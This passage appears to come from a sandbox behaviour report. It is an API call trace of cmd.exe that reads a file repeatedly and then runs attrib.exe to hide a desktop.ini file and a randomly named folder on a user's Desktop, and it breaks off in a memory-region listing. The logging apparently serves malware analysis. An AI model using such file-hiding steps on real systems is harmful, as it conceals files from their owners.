lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.903] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.904] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.905] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.906] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.929] _close (_FileHandle=4) returned 0 [0136.929] FindNextFileW (in: hFindFile=0x3d1488, lpFindFileData=0x2af068 | out: lpFindFileData=0x2af068) returned 0 [0136.930] GetLastError () returned 0x12 [0136.930] FindClose (in: hFindFile=0x3d1488 | out: hFindFile=0x3d1488) returned 1 [0136.930] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0136.932] _close (_FileHandle=3) returned 0 [0136.932] GetConsoleTitleW (in: lpConsoleTitle=0x2af4a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.932] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.932] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.933] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.933] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0136.933] GetLastError () returned 0x2 [0136.933] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0136.933] GetLastError () returned 0x2 [0136.933] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0x3d1488 [0136.933] FindClose (in: hFindFile=0x3d1488 | out: hFindFile=0x3d1488) returned 1 [0136.933] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0136.933] GetLastError () returned 0x2 [0136.933] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0x3d1488 [0136.933] FindClose (in: hFindFile=0x3d1488 | out: hFindFile=0x3d1488) returned 1 [0136.934] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.934] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.934] GetConsoleTitleW (in: lpConsoleTitle=0x2af234, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.934] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af0bc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af184 | out: lpAttributeList=0x2af0bc, lpSize=0x2af184) returned 1 [0136.934] UpdateProcThreadAttribute (in: lpAttributeList=0x2af0bc, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af17c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af0bc, lpPreviousValue=0x0) returned 1 [0136.934] GetStartupInfoW (in: lpStartupInfo=0x2af078 | out: lpStartupInfo=0x2af078*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0136.934] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0136.934] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af118*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af164 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", lpProcessInformation=0x2af164*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd24, dwThreadId=0xd28)) returned 1 [0136.936] CloseHandle (hObject=0x50) returned 1 [0136.937] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0136.937] GetEnvironmentStringsW () returned 0x3d2e28* [0136.938] FreeEnvironmentStringsW (penv=0x3d2e28) returned 1 [0136.938] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0137.004] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af058 | out: lpExitCode=0x2af058*=0x0) returned 1 [0137.004] CloseHandle (hObject=0x4c) returned 1 [0137.004] _vsnwprintf (in: _Buffer=0x2af1a0, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af064 | out: _Buffer="00000000") returned 8 [0137.004] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0137.004] GetEnvironmentStringsW () returned 0x3d2e28* [0137.004] FreeEnvironmentStringsW (penv=0x3d2e28) returned 1 [0137.004] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0137.004] GetEnvironmentStringsW () returned 0x3d2e28* [0137.004] FreeEnvironmentStringsW (penv=0x3d2e28) returned 1 [0137.004] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af0bc | out: lpAttributeList=0x2af0bc) [0137.004] GetConsoleTitleW (in: lpConsoleTitle=0x2af4a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.004] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0137.004] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0137.004] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0137.005] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0137.005] GetLastError () returned 0x2 [0137.005] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0137.005] GetLastError () returned 0x2 [0137.005] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0x3d1488 [0137.005] FindClose (in: hFindFile=0x3d1488 | out: hFindFile=0x3d1488) returned 1 [0137.005] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0xffffffff [0137.005] GetLastError () returned 0x2 [0137.005] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed3c) returned 0x3d1488 [0137.005] FindClose (in: hFindFile=0x3d1488 | out: hFindFile=0x3d1488) returned 1 [0137.005] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0137.005] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0137.005] GetConsoleTitleW (in: lpConsoleTitle=0x2af234, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.006] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af0bc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af184 | out: lpAttributeList=0x2af0bc, lpSize=0x2af184) returned 1 [0137.006] UpdateProcThreadAttribute (in: lpAttributeList=0x2af0bc, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af17c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af0bc, lpPreviousValue=0x0) returned 1 [0137.006] GetStartupInfoW (in: lpStartupInfo=0x2af078 | out: lpStartupInfo=0x2af078*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0137.006] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0137.006] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af118*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af164 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"", lpProcessInformation=0x2af164*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd14, dwThreadId=0xd10)) returned 1 [0137.007] CloseHandle (hObject=0x4c) returned 1 [0137.007] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0137.007] GetEnvironmentStringsW () returned 0x3d38d0* [0137.007] FreeEnvironmentStringsW (penv=0x3d38d0) returned 1 [0137.007] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0137.196] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af058 | out: lpExitCode=0x2af058*=0x0) returned 1 [0137.196] CloseHandle (hObject=0x50) returned 1 [0137.196] _vsnwprintf (in: _Buffer=0x2af1a0, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af064 | out: _Buffer="00000000") returned 8 [0137.196] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0137.196] GetEnvironmentStringsW () returned 0x3d38d0* [0137.196] FreeEnvironmentStringsW (penv=0x3d38d0) returned 1 [0137.197] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0137.197] GetEnvironmentStringsW () returned 0x3d38d0* [0137.197] FreeEnvironmentStringsW (penv=0x3d38d0) returned 1 [0137.197] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af0bc | out: lpAttributeList=0x2af0bc) [0137.197] _get_osfhandle (_FileHandle=1) returned 0x7 [0137.197] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0137.197] _get_osfhandle (_FileHandle=1) returned 0x7 [0137.197] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0137.197] _get_osfhandle (_FileHandle=0) returned 0x3 [0137.197] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0137.197] SetConsoleInputExeNameW () returned 0x1 [0137.197] GetConsoleOutputCP () returned 0x1b5 [0137.198] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0137.198] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.198] exit (_Code=0) Process: id = "144" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16620" os_pid = "0xd78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0xcb0" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14256 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14257 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14258 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14259 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14260 start_va = 0xde0000 end_va = 0xde6fff entry_point = 0xde0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 14261 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14262 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14263 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14264 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 14265 start_va = 0x7ffdf000 end_va = 